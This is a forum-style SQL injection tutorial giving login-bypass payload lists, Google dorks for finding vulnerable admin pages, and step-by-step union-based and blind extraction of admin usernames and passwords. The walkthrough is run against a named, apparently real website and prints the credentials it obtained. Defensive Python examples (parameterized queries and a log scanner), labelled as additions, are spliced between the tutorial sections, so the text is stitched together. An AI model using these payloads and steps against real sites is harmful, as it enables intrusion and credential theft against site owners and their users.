
Complete SQL Injection Tutorial

Introduction:
Hello everyone.
I am going to share one of my best tutorials with you here.

Now let's begin!!

SQL injection (SQLi, or Structured Query Language injection) is the first step on the way to exploiting or hacking websites. It is easily done and it is a great starting-off point. Unfortunately most SQLi tutorials suck, so that is why I am writing this one. SQLi is basically injecting queries into a database, or using queries to get an authorization bypass as admin.

Things you should know:
Data is in the columns, the columns are in tables, and the tables are in the database.
Just remember that so you understand the rest.

PART 1
Bypassing admin login
Gaining auth bypass on an admin account.

Most sites vulnerable to this are .asp.
First we need to find a site, so start by opening Google.
Now we type our dork (definition of dork: a search entry for a certain type of site/exploit, etc.).
There is a large number of Google dorks for basic SQL injection.
Here are the best:

"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
Now, what to do once we get to our site.
The site should look something like this:
ADMIN USERNAME :
PASSWORD :

So what we do here is, in the username field, we always type "Admin",
and for our password we type our SQL injection.

Here is a list of SQL injections:

' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'

So your input should look like this:

username: Admin
password: 'or'1'='1

That will confuse the site and give you authorisation to enter as admin.
If the site is vulnerable, then you are in :D
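Why the password field trick above works, and what stops it, as an added example that is not part of the tutorial: a constructed SQLite admin table is queried first by string concatenation (the way the bypassed sites build their login check) and then with bound parameters. The table name, account and password value are assumptions for the example.

```python
import sqlite3

# Constructed in-memory admin table standing in for the site's login backend
# (example code added here, not code from the tutorial).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE tbladmin (username TEXT, password TEXT)")
conn.execute("INSERT INTO tbladmin VALUES ('Admin', 's3cret-not-guessable')")


def login_vulnerable(username, password):
    """Builds the WHERE clause by string concatenation, as the bypassed sites do.

    With the password  ' or '1'='1  the statement becomes
      ... WHERE username='Admin' AND password='' or '1'='1'
    and the OR makes the condition true for every row."""
    sql = ("SELECT username FROM tbladmin WHERE username='" + username
           + "' AND password='" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(username, password):
    """Same check with bound parameters: the input is data, never SQL text."""
    sql = "SELECT username FROM tbladmin WHERE username=? AND password=?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    payload = "' or '1'='1"
    print("concatenated query  ->", login_vulnerable("Admin", payload))  # Admin
    print("parameterized query ->", login_safe("Admin", payload))        # None
```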
PART 2
Finding Sites to Inject

Finding SQLi-vulnerable sites is extremely easy; all you need to do is some googling. The first thing you need to do is find some dorks.
Download the SQLi dorks list from here:

http://adf.ly/cjpJ <--- password is somewhere in it
PS: I didn't put them in the thread because I passed the character limit...
Pick one of those dorks and add inurl: before it (if it does not already have it), then copy and paste it into Google. Pick one of the sites off Google and go to it.
For example, the URL of the page you are on may look like this: http://www.leadacidbatteryinfo.org/newsdetail.php?id=10

To check that it is vulnerable, all you have to do is add a ' to the end of the URL.

Press Enter and you get some kind of error. The errors will vary...
Our page should look like that:
[Image: vulnerror.jpg]
After you find your vulnerable site, the first step you need to take is to find the number of columns. The easiest way to do this is writing "order by " followed by a column number, and we add "--" after the number.
Our link should look like that:

http://www.leadacidbatteryinfo.org/newsdetail.php?id=10
order by 15--

If you get an error, that means you should lower the number of columns.

With order by 10 the page opened normally; that means the number of columns is between 10 and 14.

With order by 11 the page opened normally too...

With order by 12 we got an error. That means the column number is 11, because we got an error on 12 and 11 opened normally.

Finding Accessible Columns
Now that we have the number of columns, we need to get the column numbers that we can grab information from.
We can do that by adding a "-" before the "10", replacing " order by # " with "union all select ", and listing the column numbers.
Our link should look like that:

http://www.leadacidbatteryinfo.org/newsd...php?id=-10
union all select 1,2,3,4,5,6,7,8,9,10,11--

We should get numbers.
Our page should look like that:
[Image: vulncolumns.jpg]

For the end part of the URL (1,2,3,4,5,6,7,8,9,10,11) you put the number of columns you found in the first step. Since I found that the site I was testing had 11 columns, I put 1,2,3,4,5,6,7,8,9,10,11--
The numbers that show up on the page are the column numbers we can get information from. We will replace them later with something else, so write them down if you want.

Getting Database Version
We found that columns 8, 3, 4 and 5 are vulnerable, so we will use them to get the database version.
Why do we do that?
If the database version is under 5, that means we will have to guess the table names (there is no information_schema to list them).
To do that we need to replace one of the vulnerable columns with "@@version".
Let's take column 8.
Our link should look like that:

http://www.leadacidbatteryinfo.org/newsd...php?id=-10
union all select 1,2,3,4,5,6,7,@@version,9,10,11--

[Image: dbversion.jpg]

In our case we got "5.0.77"; it's version 5.x, so we can continue.

Now we need to get the name of the table we want to access:
To do it we need to replace "@@version" with "table_name", add "from information_schema.tables" after the last column number, and add "--" at the end.
Link should be like that:

http://www.leadacidbatteryinfo.org/newsd...php?id=-10
union all select 1,2,3,4,5,6,7,table_name,9,10,11 from information_schema.tables--

Page should look like that:
[Image: tablenames.jpg]

Now we will search for the table we want to access.
We should find something with admin in it, and in our case it's tbladmin.
Now we need to get the ASCII value of "tbladmin".
What is ASCII? It is the numeric code each character is stored as.
To get the ASCII value of "tbladmin" go to that site: http://getyourwebsitehere.com/jswb/text_to_ascii.html

Now enter the table name, which is "tbladmin" in our case, in the first box and click convert to ASCII.
You will get as value that:
Code:
&#116;&#98;&#108;&#97;&#100;&#109;&#105;&#110;
Now remove the characters & # ; and add a comma "," between each number.
It should be like that:
Code:
116,98,108,97,100,109,105,110


Now we replace "table_name" in the URL with "column_name", change "information_schema.tables" to "information_schema.columns", and add "where table_name=char(ASCII value)--".
In our case, in place of (ASCII value) we put 116,98,108,97,100,109,105,110.
Our URL should look like that:

http://www.leadacidbatteryinfo.org/newsd...php?id=-10
union all select 1,2,3,4,5,6,7,column_name,9,10,11 from information_schema.columns where table_name=char(116,98,108,97,100,109,105,110)--

Our page should be like that:
[Image: columnsm.jpg]

Now we search for the columns named "username" and "password", or something like that.
In our case it is "username" and "password".
Now we can delete most of the URL.
Remove everything after the 11 and add "from tbladmin", and replace "column_name" with "concat(username,0x3a,password)".
0x3a is the hex ASCII value of a ":" so we can separate the username from the password.
Our URL should look like that:
http://www.leadacidbatteryinfo.org/newsd...php?id=-10
union all select 1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11 from tbladmin

Our page should look like that:

And you're done: the username is ishir and the password is ishir123.
Sometimes the password is encrypted with hashes.
Use my HASH detector to know what it is and decrypt it online.
http://adf.ly/cjpJ <---- the password is in it somewhere :)
And we're done!

I hope you liked my tutorial.
ALL credits go to me!
Thanks for reading that thread.
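The newsdetail.php?id= defect from PART 2 in code, as an added example that is not from the tutorial: in a numeric context the id needs no quotes, so a concatenated query takes the whole "-10 union all select ..." string as SQL, while the fixed version rejects anything that is not an integer before it reaches the database and binds the value. The news table and its row are constructed for the example, and SQLite stands in for the site's MySQL.

```python
import sqlite3

# Constructed news table standing in for newsdetail.php's backend
# (added example, not code from the tutorial).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE news (id INTEGER, title TEXT, body TEXT)")
conn.execute("INSERT INTO news VALUES (10, 'Battery care', 'Keep terminals clean')")


def newsdetail_vulnerable(id_param):
    """Numeric context: no quotes needed, the raw string is spliced into the SQL.

    id=-10 union all select 1,2--  selects no real row (id -10 does not exist)
    and appends a row of chosen values, which is why the page shows numbers."""
    sql = "SELECT title, body FROM news WHERE id=" + id_param
    return conn.execute(sql).fetchall()


def newsdetail_safe(id_param):
    """Reject anything that is not an integer, then bind the value."""
    try:
        news_id = int(id_param)
    except ValueError:
        return []  # 10', 10 order by 15--, -10 union ... never reach the database
    return conn.execute("SELECT title, body FROM news WHERE id=?", (news_id,)).fetchall()


if __name__ == "__main__":
    probe = "-10 union all select 1,2--"
    print("concatenated ->", newsdetail_vulnerable(probe))  # [(1, 2)]
    print("validated    ->", newsdetail_safe(probe))        # []
```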

Blind SQL Injections ★★★

Step 1 Finding Vulnerabilities

Well, as you know from my first tutorial, a vulnerable website has security holes. Therefore we will take this test website:

Code:

site.com/index.php?id=1

To find out if it's vulnerable we will undergo a little test.

For that we will add some strings. As everybody knows, the number 1 is equal to 1, but not to 2.

Therefore we will compare these two websites:

Code:

site.com/index.php?id=1 and 1=1

and

site.com/index.php?id=1 and 1=2

If "and 1=1" loads perfectly, but "and 1=2" is missing some content, the website is vulnerable.

However, if they both load without missing content, it is not vulnerable.



Step 2 Finding The MySQL Version

This isn't of much use in this kind of injection, but it might be useful.

To find it out, you'll have to 'guess' the version.

It's either 4 or 5.

To find it out do this:

Code:

site.com/index.php?id=1 and substring(@@version,1,1)=5

or

site.com/index.php?id=1 and substring(@@version,1,1)=4

If one of them is loading without missing any content, it's that version.

(You can do the same with the database name and user.)



Step 3 Guessing The Table Names

As you can see, guessing is important in blind SQLi. That's also needed for the table and its columns :p

To get the right table you'll have to guess it this way:

Quote:site.com/index.php?id=1 and (select 1 from insert table here limit 0,1)=1
Insert your guessed table name in place of "insert table here". If the website is loading without content missing, then the table exists.

Suppose we've got this:

Code:

site.com/index.php?id=1 and (select 1 from admin limit 0,1)=1


Step 4 Guessing The Columns In A Table

We will now guess the columns in this certain table (example = admin).

Do this:

Quote:site.com/index.php?id=1 and (select substring(concat(1,guessed column),1,1) from table limit 0,1)=1

This is an example:

Code:

site.com/index.php?id=1 and (select substring(concat(1,username),1,1) from admin limit 0,1)=1

Suppose we've found a username and a password column in the table admin.



Step 5 Extracting Information From The Columns

Note: You can do the same with some tools.

But I prefer to do it manually.

For this we have to put the syntax in ASCII and guess its chars.

Note that each time you do this, you'll get 1 letter.

Do this:

Quote:site.com/index.php?id=1 and ascii(substring((select concat(column 1,0x3a,column 2) from table limit 0,1),1,1))>char number

Suppose that we've guessed 70. The website then loads normally. That means that the number must be higher.

Keep guessing until the website loads with some content missing.

So that means the first number that loads false after a number that loads true is the right char.

Suppose that it's 85.

The example would be:

Code:

site.com/index.php?id=1 and ascii(substring((select concat(username,0x3a,password) from admin limit 0,1),1,1))>85

To get the first letter of username:password you'll have to use an ASCII table.

Here is one: http://www.asciitable.com/index/asciifull.gif

Navigate to the found char (which is "dec" in the ASCII table) and look up the "chr".

That means that the char from the example (85) is the capital letter U.



To find the 2nd letter and higher you will have to change the number after "limit" (underlined in the original) in the syntax:

Quote:site.com/index.php?id=1 and ascii(substring((select concat(username,0x3a,password) from admin limit 1,1),1,1))>(char)

change to

site.com/index.php?id=1 and ascii(substring((select concat(username,0x3a,password) from admin limit 2,1),1,1))>(char)

site.com/index.php?id=1 and ascii(substring((select concat(username,0x3a,password) from admin limit 3,1),1,1))>(char)

etc.

You'll notice you've got to the end when (number),1 isn't giving any information anymore.

Suppose we've now found that the username:password = UserAdmin:BagelJuice
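What both tutorials look like from the server side, as an added example not taken from the page: a small scanner over constructed access-log lines that matches the decoded query string against the probes walked through above (the appended quote with a server error, order by, union all select, information_schema, and 1=1 / and 1=2, ascii(substring(...))) and counts boolean probes per client, since the blind method needs one request per character. The log lines, client addresses and signature names are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed web-server log lines (added example, not part of the tutorial);
# query strings are URL-encoded the way a server records them.
LOG = """\
203.0.113.5 "GET /newsdetail.php?id=10 HTTP/1.1" 200
203.0.113.5 "GET /newsdetail.php?id=10%27 HTTP/1.1" 500
203.0.113.5 "GET /newsdetail.php?id=10+order+by+15-- HTTP/1.1" 500
203.0.113.5 "GET /newsdetail.php?id=-10+union+all+select+1,2,3,4,5,6,7,table_name,9,10,11+from+information_schema.tables-- HTTP/1.1" 200
198.51.100.9 "GET /index.php?id=1+and+1%3D1 HTTP/1.1" 200
198.51.100.9 "GET /index.php?id=1+and+1%3D2 HTTP/1.1" 200
198.51.100.9 "GET /index.php?id=1+and+ascii(substring((select+concat(username,0x3a,password)+from+admin+limit+0,1),1,1))%3E85 HTTP/1.1" 200
192.0.2.7 "GET /index.php?id=2 HTTP/1.1" 200
"""

# Signatures for the probes this page walks through, matched on the decoded path.
PATTERNS = {
    "tautology": re.compile(r"\bor\s*'?\w+'?\s*=\s*'?\w+'?"),
    "column-count-probe": re.compile(r"\border\s+by\s+\d+"),
    "union-select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "schema-enumeration": re.compile(r"\binformation_schema\."),
    "boolean-probe": re.compile(r"\band\s+(\d+\s*=\s*\d+|\(?\s*select\b|substring\s*\(|ascii\s*\()"),
}
LINE = re.compile(r'(\S+) "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')


def scan(log):
    """Return (alerts, boolean probes per client).

    One boolean probe is noise; blind extraction needs a request per character,
    so a high per-client count is the signal worth escalating."""
    alerts, probes = [], Counter()
    for line in log.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        client, status = m.group(1), int(m.group(3))
        path = unquote_plus(m.group(2)).lower()
        hits = [name for name, rx in PATTERNS.items() if rx.search(path)]
        # A quote in the query string followed by a server error is the "add a '" test.
        if "'" in path and status >= 500:
            hits.append("quote-error-probe")
        if hits:
            alerts.append((client, path.split("?", 1)[0], hits))
        probes[client] += hits.count("boolean-probe")
    return alerts, probes
```

scan(LOG) returns six alerts over the constructed lines and a count of three boolean probes for 198.51.100.9; login-form payloads travel in POST bodies, which access logs do not record, so that case needs application-level logging.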



--



Outro

Thank you very much for reading this tutorial. If there are any questions, or you feel like I forgot something, please feel free to post it here.

Also please report any grammatical errors, as I try to avoid them.

I hope I helped you with this thread.
